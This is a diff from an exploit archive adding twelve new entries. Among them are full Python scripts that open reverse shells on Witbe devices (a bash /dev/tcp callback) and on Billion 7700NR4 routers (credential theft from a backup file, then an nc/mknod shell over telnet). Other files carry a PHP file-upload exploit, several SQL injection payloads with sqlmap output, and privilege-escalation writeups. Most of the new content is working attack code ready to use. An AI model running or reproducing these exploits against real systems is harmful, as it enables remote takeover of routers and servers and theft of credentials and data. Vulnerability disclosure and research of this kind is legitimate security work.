DB: 2016-10-07

12 new exploits

phpBB 2.0.10 - Remote Command Execution (CGI)

Advance MLM Script - SQL Injection

Picosafe Web Gui - Multiple Vulnerabilities
Witbe - Remote Code Execution
PHP Classifieds Rental Script - Blind SQL Injection
B2B Portal Script - Blind SQL Injection
MLM Unilevel Plan Script v1.0.2 - SQL Injection
Just Dial Clone Script - SQL Injection
Comodo Dragon Browser - Unquoted Service Path Privilege Escalation
Billion Router 7700NR4 - Remote Command Execution
Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation
Exagate WEBPack Management System - Multiple Vulnerabilities

files.csv

@@ -520,7 +520,7 @@ id,file,description,date,author,platform,type,port
 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143
 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0
 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0
-673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
+673,platforms/php/webapps/673.pl,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0
 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0
 676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0
 677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0
@@ -3881,6 +3881,7 @@ id,file,description,date,author,platform,type,port
 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0
 4227,platforms/windows/dos/4227.php,"PHP - PHP_gd2.dll imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0
 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 - Subscribe Remote Overflow",2007-07-26,ZhenHan.Liu,windows,remote,143
+40466,platforms/php/webapps/40466.txt,"Advance MLM Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - '.mls' Local Buffer Overflow",2007-07-26,"Arham Muhammad",windows,local,0
 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0
 4231,platforms/aix/local/4231.c,"IBM AIX 5.3 sp6 - capture Terminal Sequence Privilege Escalation",2007-07-27,qaaz,aix,local,0
@@ -36575,6 +36576,7 @@ id,file,description,date,author,platform,type,port
 40450,platforms/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Privilege Escalation",2016-10-03,"Dawid Golunski",linux,local,0
 40451,platforms/win_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",win_x86-64,local,0
 40452,platforms/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - Buffer Overflow",2016-10-03,Tulpa,windows,remote,80
+40454,platforms/php/webapps/40454.txt,"Picosafe Web Gui - Multiple Vulnerabilities",2016-10-05,"Shahab Shamsi",php,webapps,0
 40455,platforms/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40456,platforms/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40457,platforms/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
@@ -36582,3 +36584,12 @@ id,file,description,date,author,platform,type,port
 40459,platforms/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - Buffer Overflow",2016-10-05,Tulpa,windows,remote,80
 40460,platforms/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
 40461,platforms/windows/local/40461.txt,"Fortitude HTTP 1.0.4.0 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,windows,local,0
+40462,platforms/cgi/webapps/40462.py,"Witbe - Remote Code Execution",2016-10-05,BeLmar,cgi,webapps,0
+40467,platforms/php/webapps/40467.txt,"PHP Classifieds Rental Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
+40468,platforms/php/webapps/40468.txt,"B2B Portal Script - Blind SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
+40469,platforms/php/webapps/40469.txt,"MLM Unilevel Plan Script v1.0.2 - SQL Injection",2016-10-06,N4TuraL,php,webapps,0
+40470,platforms/php/webapps/40470.txt,"Just Dial Clone Script - SQL Injection",2016-10-06,OoN_Boy,php,webapps,0
+40471,platforms/windows/local/40471.txt,"Comodo Dragon Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
+40472,platforms/hardware/remote/40472.py,"Billion Router 7700NR4 - Remote Command Execution",2016-10-06,R-73eN,hardware,remote,0
+40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,@Th3GundY,windows,local,0
+40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0

platforms/cgi/webapps/40462.py

@@ -0,0 +1,39 @@
+#!/usr/bin/python
+# Exploit Title: Witbe RCE (Remote Code Execution)
+# Exploit Author: BeLmar
+# Date: 05/10/2016
+# DEMO : https://youtu.be/ooUFXfUfIs0
+# Contact : hb.mz093@gmail.com
+# Vendor Homepage: http://www.witbe.net
+# Tested on: Windows7/10 & BackBox
+# Category: Remote Exploits
+
+import urllib
+import urllib2
+import os
+
+print " M    MW    M  M  XXMMrX, 2Mr72S   MW7XS"                             
+print " MM   MM   M2  M    SM    MM   MM  M    "                             
+print "  M  M ZM  M   M    XM    MMir0M   MMrXS"                              
+print "  MM M  M M:   M    SM    MM   ZM  M2   "                             
+print "   MMa  MMM    M    ZM    MM   XM  M    "                              
+print "   XM    M     M    iM    8MZ8W8   MM8BB" 
+print "             EXPLOIT BY BELMAR          "
+print ""
+
+print "Run NetCat Listner" # First Run Netcat Listner 
+
+rhost = raw_input('RHOST: ')
+lhost = raw_input('LHOST: ')
+lport = raw_input('LPORT: ')
+
+url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
+user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
+values = {'auth_login': '', #Leave it as it is
+          'auth_pwd': '',   #Leave it as it is
+          'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }
+
+data = urllib.urlencode(values)
+req = urllib2.Request(url, data)
+response = urllib2.urlopen(req)
+the_page = response.read()

platforms/hardware/remote/40472.py

@@ -0,0 +1,69 @@
+# Title : Billion Router 7700NR4 Remote Root Command Execution
+# Date : 06/10/2016
+# Author : R-73eN
+# Tested on: Billion Router 7700NR4 
+# Vendor : http://www.billion.com/
+# Vulnerability Description:
+# This router is a widely used here in Albania. It is given by a telecom provider to the home and bussiness users.
+# The problem is that this router has hardcoded credentials which "can not be changed" by a normal user. Using these 
+# credentials we don't have to much access but the lack of authentication security we can download the backup and get the admin password.
+# Using that password we can login to telnet server and use a shell escape to get a reverse root connection.
+# You must change host with the target and reverse_ip with your attacking ip.
+# Fix:
+# The only fix is hacking your router with this exploit, changing the credentials and disabling all the other services using iptables. 
+#
+
+import requests
+import base64
+import socket
+import time
+
+host = ""
+def_user = "user"
+def_pass = "user"
+reverse_ip = ""
+#Banner
+banner = ""
+banner +="  ___        __        ____                 _    _  \n"
+banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
+banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
+banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
+banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
+print banner
+
+
+# limited shell escape
+evil = 'ping ;rm /tmp/backpipe;cd tmp;echo "mknod backpipe p && nc ' + reverse_ip  + ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;chmod +x rev.sh;sh /tmp/rev.sh &'
+
+def execute_payload(password):
+	print "[+] Please run nc -lvp 1337 and then press any key [+]"
+	raw_input()
+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+	s.connect((host,23))
+	s.recv(1024)
+	s.send("admin\r")
+	a= s.recv(1024)
+	time.sleep(1)
+	s.send(password +"\r")
+	time.sleep(1)
+	s.recv(1024)
+	s.send(evil + "\r")
+	time.sleep(1)
+	print "[+] If everything worked you should get a reverse shell [+]"
+	print "[+] Warning pressing any key will close the SHELL [+]"
+	raw_input()
+
+
+
+
+r = requests.get("http://" + host + "/backupsettings.conf" , auth=(def_user,def_pass))
+if(r.status_code == 200):
+	print "[+] Seems the exploit worked [+]"
+	print "[+] Dumping data . . . [+]"
+	temp = r.text
+	admin_pass = temp.split("<AdminPassword>")[1].split("</AdminPassword>")[0]
+#	print "[+] Admin password : " + str(base64.b64decode(admin_pass)) + " [+]"
+	execute_payload(str(base64.b64decode(admin_pass)))
+else:
+	print "[-] Exploit Failed [-]"
+print "\n[+] https://www.infogen.al/ [+]\n\n"

platforms/hardware/remote/40474.txt

@@ -0,0 +1,100 @@
+Document Title:
+================
+Exagate WEBpack Management System Multiple Vulnerabilities
+
+Author:
+========
+Halil Dalabasmaz
+
+Release Date:
+==============
+07 OCT 2016
+
+Product & Service Introduction:
+================================
+WEBPack is the individual built-in user-friendly and skilled web
+interface allowing web-based access to the main units of the SYSGuard
+and POWERGuard series. The advanced software enables the users to
+design their customized dashboard smoothly for a detailed monitoring
+and management of all the power outlet sockets & sensor and volt free
+contact ports, as well as relay outputs. User definition and authorization,
+remote access and update, detailed reporting and archiving are among the
+many features.
+ 
+Vendor Homepage:
+=================
+http://www.exagate.com/
+
+Vulnerability Information:
+===========================
+Exagate company uses WEBPack Management System software on the hardware.
+The software is web-based and it is provide control on the hardware. There are
+multiple vulnerabilities on that software.
+
+Vulnerability #1: SQL Injection
+================================
+
+There is no any filtering or validation mechanisim on "login.php". "username"
+and "password" inputs are vulnerable to SQL Injection attacks. Sample POST
+request is given below.
+
+POST /login.php HTTP/1.1
+Host: <TARGET HOST>
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 37
+
+username=root&password=' or 1=1--
+
+Vulnerability #2: Unauthorized Access To Sensetive Information
+===============================================================
+
+The software is capable of sending e-mail to system admins. But there is no
+any authorization mechanism to access e-mail logs. The e-mail logs can accessable
+anonymously from "http://<TARGET HOST>/emaillog.txt".
+
+Vulnerability #3: Unremoved Configuration Files
+================================================
+
+The software contains the PHP Info file on the following URL.
+
+http://<TARGET HOST>/api/phpinfo.php
+
+Vulnerability Disclosure Timeline:
+==================================
+03 OCT 2016 - 	Attempted to contact vendor after discovery of vulnerabilities
+06 OCT 2016 - 	No response from vendor and re-attempted to contact vendor
+07 OCT 2016 - 	No response from vendor
+07 OCT 2016 - 	Public Disclosure
+ 
+Discovery Status:
+==================
+Published
+ 
+Affected Product(s):
+=====================
+Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities)
+
+Tested On:
+===========
+Exagate SYSGuard 3001
+
+Disclaimer & Information:
+==========================
+The information provided in this advisory is provided as it is without 
+any warranty. BGA disclaims all  warranties, either expressed or implied,
+including the warranties of merchantability and capability for a particular
+purpose. BGA or its suppliers are not liable in any case of damage, including
+direct, indirect, incidental, consequential loss of business profits or
+special damages.
+  
+Domain:     www.bgasecurity.com
+Social:     twitter.com/bgasecurity
+Contact:    advisory@bga.com.tr
+
+Copyright © 2016 | BGA Security LLC

platforms/php/webapps/40454.txt

@@ -0,0 +1,65 @@
+[-] Title  : Picosafe Web Gui - Multiple Vulnerabilities 
+[-] Author : Shahab Shamsi
+[-] Vendor : https://github.com/embeddedprojects/picosafe_webgui
+[-] Category : Webapps
+[-] Date : 01.October.2016
+
+
+
+Vulnerable page :
+picosafe_webgui/webinterface/js/filemanager/filemanager.php
+
+
+
+
+==========================
+|  Remote File Upload :
+==========================
+Vulnerable Source (RFU) :
+52: chmod($to, 0755); 
+48: $to = realpath($curdir) . '/' . $name; 
+40: function uploadfile($curdir)
+46: $name = $_FILES['files']['name'][0];
+
+Exploit :
+<?php
+$uploadfile="YourFileName";
+$ch = curl_init("http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php");
+curl_setopt($ch, CURLOPT_POST, true);
+curl_setopt($ch, CURLOPT_POSTFIELDS,
+array('file'=>"@$uploadfile"));
+curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
+$result = curl_exec($ch);
+curl_close($ch);
+print "$result";
+?>
+
+Location :
+http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/FileName
+
+
+==========================
+|  Local File Disclosure :
+==========================
+
+Vulnerable Source (LFD) :
+17: $file = base64_decode($_GET['file']);
+18: DownloadFile($file);
+111: readfile($file);
+
+POC :
+http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?file=base64code-Filename
+
+
+==========================
+|  Cross-Site Scripting :
+==========================
+
+Vulnerable Source (XSS) :
+8: echo json_encode($data); 
+7: $data = sortfiles($data); 
+6: $data = listdirectory($directory); 
+5: $directory = base64_decode($_GET['directory']); 
+
+POC :
+http://localhost:8282/picosafe_webgui/webinterface/js/filemanager/filemanager.php?directory=Base64-ScriptingCode

platforms/php/webapps/40466.txt

@@ -0,0 +1,60 @@
+[x]========================================================================================================================================[x]
+ | Title		: Advance MLM Script SQL Vulnerabilities
+ | Software		: Advance MLM Script
+ | Vendor		: http://www.i-netsolution.com/
+ | Demo         : http://www.i-netsolution.com/item/advance-mlm-script/live_demo/236431
+ | Google Dork 	: news_detail.php?newid= © MLM SCRIPT
+ | Date         : 06 October 2016
+ | Author		: OoN_Boy
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Technology		: PHP
+ | Database			: MySQL
+ | Price			: $ 199
+ | Description      : MLM business upward day by day, Open Source MLM Script plays an important role for successful multilevel marketing business.
+ Our advanced featured PHP MLM Script enables MLM companies to manage and run their express selling business more effectively towards a successful way.
+[x]========================================================================================================================================[x]
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Exploit		: http://localhost/mlm/news_detail.php?newid=%Inject_Here%26
+ | Aadmin Page	: http://localhost/[path]/admin/index.php  
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Proof of concept : sqlmap -u "http://localhost/mlm/news_detail.php?newid=26" --invalid-string
+[x]========================================================================================================================================[x] 
+
+ ---
+Parameter: newid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: newid=26' AND 4440=4440 AND 'AJmz'='AJmz
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: newid=26' OR SLEEP(5) AND 'FokP'='FokP
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 6 columns
+    Payload: newid=jMCtRq' UNION ALL SELECT NULL,CONCAT(0x71787a7a71,0x48755652787877617966627661486164744748424b6155564f514370537747504c6e736876665150,0x7178787171),NULL,NULL,NULL,NULL-- Afye
+---
+
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Greetz	:	antisecurity.org batamhacker.or.id
+ |				Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
+ |				k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
+[x]========================================================================================================================================[x]
+
+[x]========================================================================================================================================[x]
+| Hi All long time no see ^_^
+[x]========================================================================================================================================[x] 

platforms/php/webapps/40467.txt

@@ -0,0 +1,61 @@
+[x]========================================================================================================================================[x]
+ | Title	: PHP Classifieds Rental Script Blind SQL Vulnerabilities
+ | Software	: PHP Classifieds Rental Script
+ | Vendor	: http://www.i-netsolution.com/
+ | Demo         : http://www.i-netsolution.com/item/php-classifieds-rental-script/244993
+ | Date         : 06 October 2016
+ | Author	: OoN_Boy
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Technology		: PHP
+ | Database		: MySQL
+ | Price		: $ 99
+ | Description		: PHP Classifieds Rental Script The PHP Rental Classifieds Script is one among the limited software's, which are designed
+			  so user-friendly that anyone with minimal knowledge of operating a computer can utilize it to its optimum. Besides being
+			  an easy-to- use software, this Property Rental Script
+[x]========================================================================================================================================[x]
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Exploit	: http://localhost/product_details.php?refid=%Inject_Here%1319258872
+ | Aadmin Page	: http://localhost/[path]/admin/index.php  
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Proof of concept : sqlmap -u "http://localhost/product_details.php?refid=1319258872" --invalid-string
+[x]========================================================================================================================================[x] 
+
+ ---
+Parameter: refid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: refid=1319258872' AND 3912=3912 AND 'HTMi'='HTMi
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 OR time-based blind
+    Payload: refid=1319258872' OR SLEEP(5) AND 'QwXZ'='QwXZ
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 26 columns
+    Payload: refid=xCUcyB' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787671,0x644e6e5046537647684864705a527667796f454c666c4656644a73506d4e627a48574969424a4756,0x7176786271),NULL,NULL,NULL,NULL,NULL#
+---
+
+
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Greetz	: antisecurity.org batamhacker.or.id
+ | 		  Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
+ |		  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
+[x]========================================================================================================================================[x]
+
+[x]========================================================================================================================================[x]
+| Hi All long time no see ^_^
+[x]========================================================================================================================================[x] 

platforms/php/webapps/40468.txt

@@ -0,0 +1,61 @@
+[x]========================================================================================================================================[x]
+ | Title	: B2B Portal Script Blind SQL Vulnerabilities
+ | Software	: B2B Portal Script
+ | Vendor	: http://www.i-netsolution.com/
+ | Demo         : http://www.i-netsolution.com/item/b2b-portal-script/live_demo/190275
+ | Date         : 06 October 2016
+ | Author	: OoN_Boy
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Technology		: PHP
+ | Database		: MySQL
+ | Price		: $ 249
+ | Description		: Have an idea about starting your own Alibaba clone website and thinking how to implement it? Our B2B Portal Script
+			  is the platform to transform your idea into the practical world. It is developed in PHP and MySQL and can help global
+			  portals to manage their online transactions with efficiency
+[x]========================================================================================================================================[x]
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Exploit	: http://localhost/advancedb2b/view-product.php?pid=294'
+ | Aadmin Page	: http://localhost/[path]/admin/index.php  
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Proof of concept : sqlmap -u "http://localhost/advancedb2b/view-product.php?pid=294"
+[x]========================================================================================================================================[x] 
+
+---
+Parameter: pid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: pid=294' AND 1754=1754 AND 'whqn'='whqn
+
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: pid=294' AND SLEEP(5) AND 'nGqC'='nGqC
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 33 columns
+    Payload: pid=294' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178766b71,0x656f5962547177636a47435158754754736267535a4d515a4d4c454e535052496652505243795849,0x7176626271),NULL,NULL-- lwGp
+---
+
+
+[x]========================================================================================================================================[x]
+ 
+ 
+ 
+[x]========================================================================================================================================[x]
+ | Greetz	: antisecurity.org batamhacker.or.id
+ | 		  Vrs-hCk NoGe Jack zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
+ |		  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
+[x]========================================================================================================================================[x]
+
+[x]========================================================================================================================================[x]
+| Hi All long time no see ^_^
+[x]========================================================================================================================================[x] 

platforms/php/webapps/40469.txt

@@ -0,0 +1,44 @@
+######################
+# Application Name : MLM Unilevel Plan Script v1.0.2
+
+# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL
+
+# Author Contact : https://twitter.com/byn4tural
+
+# Vendor Homepage : http://www.i-netsolution.com/
+
+# Vulnerable Type : SQL Injection
+
+# Date : 2016-10-06
+
+# Tested on : Windows 10 / Mozilla Firefox
+#             Linux / Mozilla Firefox
+#             Linux / sqlmap 1.0.6.28#dev
+
+###################### SQL Injection Vulnerability ######################
+
+# Location :
+http://localhost/[path]/news_detail.php
+
+######################
+
+# PoC Exploit:
+
+http://localhost/[path]/news_detail.php?newid=11%27%20%2F*%2130000and%20ascii%28substring%28%28database%28%29%29%2C4%2C1%29%29%3C115%20and*%2F%20%27x%27%3D%27x
+
+# Exploit Code via sqlmap:
+
+sqlmap -u http://localhost/[path]/news_detail.php?newid=11 --dbs
+
+---
+Parameter: newid (GET)
+    Type: AND/OR time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: newid=11' AND SLEEP(5) AND 'HheB'='HheB
+---
+[18:47:12] [INFO] the back-end DBMS is MySQL
+web application technology: Nginx
+back-end DBMS: MySQL >= 5.0.12
+
+######################
+

platforms/php/webapps/40470.txt

@@ -0,0 +1,40 @@
+[x]========================================================================================================================================[x]
+ | Title        : Just Dial Clone Script SQL & XSS Vulnerabilities
+ | Software     : Just Dial Clone
+ | Vendor       : http://www.i-netsolution.com/
+ | Demo         : http://www.i-netsolution.com/item/just-dial-clone/live_demo/423618
+ | Date         : 06 October 2016
+ | Author       : OoN_Boy
+[x]========================================================================================================================================[x]
+  
+  
+  
+[x]========================================================================================================================================[x]
+ | Technology       : PHP
+ | Database         : MySQL
+ | Price            : $ 299
+ | Description      : If you wish to launch your own business directory website, we have a readymade solution for you which supports unlimited
+ categories, uses and secure code. Our Company Catalogue Listing Script is just the right script for you
+[x]========================================================================================================================================[x]
+  
+  
+[x]========================================================================================================================================[x]
+ | Exploit      : http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
+ | Admin Page	: http://localhost/[path]/admin/index.php  
+[x]========================================================================================================================================[x]
+  
+  
+  
+[x]========================================================================================================================================[x]
+ | Proof of concept SQL	: http://localhost/jus/restaurants-details.php?fid=%Inject_Here%21
+[x]========================================================================================================================================[x]
+  
+[x]========================================================================================================================================[x]
+ | Greetz   :   antisecurity.org batamhacker.or.id
+ |              Vrs-hCk NoGe Jack zxvf Angela h4ntu reel dono Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va
+ |              k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere
+[x]========================================================================================================================================[x]
+ 
+[x]========================================================================================================================================[x]
+| Hi All long time no see ^_^
+[x]========================================================================================================================================[x]

platforms/windows/local/40471.txt

@@ -0,0 +1,53 @@
+# Exploit Title: Comodo Dragon Browser Unquoted Service Path Privilege Escalation
+# Date: 24/09/2016
+# Author: Yunus YILDIRIM (@Th3GundY)
+# Team: CT-Zer0 (@CRYPTTECH)
+# Website: http://yildirimyunus.com
+# Contact: yunusyildirim@protonmail.com
+# Category: local
+# Vendor Homepage: https://www.comodo.com
+# Software Link: https://www.comodo.com/home/browsers-toolbars/browser.php
+# Version: Software Version <= 52.15.25.663
+# Tested on: Windows 7 x86/x64
+
+1. Description
+
+Comodo Dragon Browser Update Service (DragonUpdater) installs as a service with 
+an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+
+2. Proof of Concept
+
+C:\>sc qc DragonUpdater
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: DragonUpdater
+        TYPE               : 10  WIN32_OWN_PROCESS 	
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Comodo\Dragon\dragon_updater.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : COMODO Dragon Update Service
+        DEPENDENCIES       : 
+        SERVICE_START_NAME : LocalSystem	
+
+
+3. Exploit:
+ 
+A successful attempt would require the local attacker must insert an executable file
+in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+
+Additional notes :
+
+Fixed in version 52.15.25.664
+https://forums.comodo.com/news-announcements-feedback-cd/comodo-dragon-v521525664-is-now-available-for-download-t116786.0.html
+
+Vulnerability Disclosure Timeline:
+=========================
+24/09/2016   -   Contact With Vendor
+26/09/2016   -   Vendor Response
+03/10/2016   -   Release Fixed Version

platforms/windows/local/40473.txt

@@ -0,0 +1,53 @@
+# Exploit Title: Comodo Chromodo Browser Unquoted Service Path Privilege Escalation
+# Date: 03/10/2016
+# Author: Yunus YILDIRIM (@Th3GundY)
+# Team: CT-Zer0 (@CRYPTTECH)
+# Website: http://yildirimyunus.com
+# Contact: yunusyildirim@protonmail.com
+# Category: local
+# Vendor Homepage: https://www.comodo.com
+# Software Link: https://www.comodo.com/home/browsers-toolbars/chromodo-private-internet-browser.php
+# Version: Software Version <= 52.15.25.664
+# Tested on: Windows 7 x86/x64
+
+1. Description
+
+Comodo Chromodo Browser Update Service (ChromodoUpdater) installs as a service with 
+an unquoted service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+
+2. Proof of Concept
+
+C:\>sc qc ChromodoUpdater
+[SC] QueryServiceConfig SUCCESS
+SERVICE_NAME: ChromodoUpdater
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Comodo\Chromodo\chromodo_updater.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : COMODO Chromodo Update Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+		
+3. Exploit:
+ 
+A successful attempt would require the local attacker must insert an executable file
+in the path of the service.
+Upon service restart or system reboot, the malicious code will be run with elevated privileges.
+
+
+Additional notes :
+
+Fixed in version 52.15.25.665
+https://forums.comodo.com/news-announcements-feedback-cd/chromodo-v521525665-is-now-available-for-download-t116787.0.html
+
+Vulnerability Disclosure Timeline:
+=========================
+03/10/2016   -   Contact With Vendor
+03/10/2016   -   Vendor Response
+05/10/2016   -   Release Fixed Version